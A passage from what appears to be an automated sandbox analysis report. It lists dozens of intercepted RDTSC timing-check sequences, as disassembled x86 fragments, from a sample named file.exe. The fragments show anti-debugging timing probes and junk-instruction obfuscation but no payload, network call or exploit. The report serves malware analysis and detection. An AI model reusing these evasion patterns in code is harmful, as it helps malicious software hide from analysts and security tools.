0x00000066 jnc 00007FFA70D2D1A6h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95082B second address: 950832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 950832 second address: 9508EB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFA70D2D1BFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D302Eh], eax 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007FFA70D2D1A8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D1F2Fh], edx 0x00000033 jc 00007FFA70D2D1BBh 0x00000039 jmp 00007FFA70D2D1B5h 0x0000003e push 00000000h 0x00000040 stc 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 jc 00007FFA70D2D1B2h 0x00000049 jmp 00007FFA70D2D1B9h 0x0000004e popad 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FFA70D2D1B5h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9509F6 second address: 950A17 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFA707966D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007FFA707966DEh 0x00000010 pop edx 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 950A17 second address: 950AD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FFA70D2D1ACh 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FFA70D2D1A8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jmp 00007FFA70D2D1B6h 0x00000030 add edi, dword ptr [ebp+122D2A66h] 0x00000036 push dword ptr fs:[00000000h] 0x0000003d jmp 00007FFA70D2D1ADh 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 mov di, C4F3h 0x0000004d mov eax, dword ptr [ebp+122D11B9h] 0x00000053 mov dword ptr [ebp+122D2F91h], eax 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push eax 0x0000005e call 00007FFA70D2D1A8h 0x00000063 pop eax 0x00000064 mov dword ptr [esp+04h], eax 0x00000068 add dword ptr [esp+04h], 00000018h 0x00000070 inc eax 0x00000071 push eax 0x00000072 ret 0x00000073 pop eax 0x00000074 ret 0x00000075 xor edi, 78674C17h 0x0000007b nop 0x0000007c pushad 0x0000007d jg 00007FFA70D2D1ACh 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9528D1 second address: 9528E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9528E7 second address: 9528EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9528EB second address: 95294B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FFA707966D8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 or dword ptr [ebp+122D20DDh], ecx 0x0000002d push 00000000h 0x0000002f jns 00007FFA707966DCh 0x00000035 mov ebx, dword ptr [ebp+122D2AE2h] 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e mov edi, dword ptr [ebp+122D2C7Eh] 0x00000044 pop ebx 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push edi 0x00000049 pushad 0x0000004a popad 0x0000004b pop edi 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9539B4 second address: 953A2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D210Fh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FFA70D2D1A8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov ebx, ecx 0x0000002d push ecx 0x0000002e pushad 0x0000002f call 00007FFA70D2D1B8h 0x00000034 pop esi 0x00000035 add dl, FFFFFF96h 0x00000038 popad 0x00000039 pop ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007FFA70D2D1A8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 00000016h 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 push eax 0x00000057 pushad 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 953A2B second address: 953A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95490F second address: 954919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FFA70D2D1A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955901 second address: 955905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955905 second address: 95590B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 954A8E second address: 954AA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957C98 second address: 957C9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 957C9E second address: 957CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FFA707966E3h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955B08 second address: 955B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E7B0 second address: 95E7BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95EA63 second address: 95EA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95EA6B second address: 95EA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95EBC6 second address: 95EBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95EBCA second address: 95EBE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9620B4 second address: 9620DA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFA70D2D1BAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9620DA second address: 9620E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9620E4 second address: 9620F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9620F3 second address: 9620F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9620F8 second address: 962114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 962114 second address: 962118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 962118 second address: 96211C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 965525 second address: 96553F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFA707966DCh 0x0000000d jnc 00007FFA707966D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96553F second address: 965543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966A29 second address: 966A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FFA707966D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 966A3B second address: 966A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96AB80 second address: 96AB8A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFA707966D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E77A second address: 96E77F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 96E77F second address: 96E785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976E20 second address: 976E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976E25 second address: 976E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9757B3 second address: 9757BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9757BD second address: 9757C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9757C1 second address: 9757C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9757C7 second address: 9757D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 975AA0 second address: 975AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 975F00 second address: 975F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FFA707966D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976184 second address: 976189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976189 second address: 976191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976191 second address: 9761C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA70D2D1ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 jns 00007FFA70D2D1A6h 0x0000001a jmp 00007FFA70D2D1B4h 0x0000001f pop eax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9762CE second address: 9762D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9762D3 second address: 976333 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFA70D2D1B9h 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007FFA70D2D1A6h 0x00000010 popad 0x00000011 jmp 00007FFA70D2D1B6h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jnl 00007FFA70D2D1CEh 0x0000001e pushad 0x0000001f jmp 00007FFA70D2D1B4h 0x00000024 jg 00007FFA70D2D1A6h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97647C second address: 9764A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA707966DBh 0x00000009 jo 00007FFA707966D6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 jmp 00007FFA707966E4h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 976616 second address: 97661B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9754A5 second address: 9754AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978894 second address: 97889A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97889A second address: 9788BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFA707966E3h 0x00000009 popad 0x0000000a jmp 00007FFA707966DAh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9788BC second address: 9788C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9788C2 second address: 9788C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9788C6 second address: 9788D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9788D3 second address: 9788E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9788E1 second address: 9788E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9788E5 second address: 9788E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9788E9 second address: 978900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FFA70D2D1A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jbe 00007FFA70D2D1A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 978900 second address: 978927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FFA707966D6h 0x0000000a popad 0x0000000b je 00007FFA707966F0h 0x00000011 jmp 00007FFA707966E4h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97DAF7 second address: 97DAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97DAFB second address: 97DAFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97DAFF second address: 97DB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FFA70D2D1B7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937C23 second address: 937C96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FFA707966D8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 add dword ptr [ebp+122D378Dh], eax 0x0000002a jmp 00007FFA707966E3h 0x0000002f lea eax, dword ptr [ebp+1247C98Fh] 0x00000035 push edx 0x00000036 push edi 0x00000037 jns 00007FFA707966D6h 0x0000003d pop ecx 0x0000003e pop ecx 0x0000003f nop 0x00000040 pushad 0x00000041 pushad 0x00000042 jne 00007FFA707966D6h 0x00000048 push edx 0x00000049 pop edx 0x0000004a popad 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e pop edx 0x0000004f popad 0x00000050 push eax 0x00000051 push eax 0x00000052 je 00007FFA707966DCh 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937C96 second address: 9205C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D3286h], edi 0x0000000c call dword ptr [ebp+122D1EF0h] 0x00000012 jbe 00007FFA70D2D1C0h 0x00000018 push edx 0x00000019 jmp 00007FFA70D2D1AEh 0x0000001e pop edx 0x0000001f push eax 0x00000020 push edi 0x00000021 pop edi 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 937D4A second address: 937D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93849B second address: 9384A5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFA70D2D1ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93852D second address: 938544 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFA707966DCh 0x00000008 je 00007FFA707966D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938664 second address: 93866A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93866A second address: 938688 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938D56 second address: 938D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFA70D2D1B4h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938D71 second address: 938DA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFA707966E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFA707966E1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938DA2 second address: 938DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFA70D2D1B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938DB6 second address: 938DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938FA3 second address: 938FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938FA7 second address: 938FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 lea eax, dword ptr [ebp+1247C98Fh] 0x0000000f mov dword ptr [ebp+122D1C1Ah], ecx 0x00000015 nop 0x00000016 jo 00007FFA707966DAh 0x0000001c push ebx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop ebx 0x00000020 push eax 0x00000021 push esi 0x00000022 pushad 0x00000023 push edi 0x00000024 pop edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938FCE second address: 921118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 jmp 00007FFA70D2D1ABh 0x0000000c call dword ptr [ebp+122D2104h] 0x00000012 push ebx 0x00000013 pushad 0x00000014 jmp 00007FFA70D2D1AEh 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97CE9F second address: 97CEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFA707966DFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97CEB4 second address: 97CEC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97D2DD second address: 97D300 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFA707966D6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FFA707966DFh 0x00000011 jc 00007FFA707966E2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97D42D second address: 97D431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97D431 second address: 97D437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
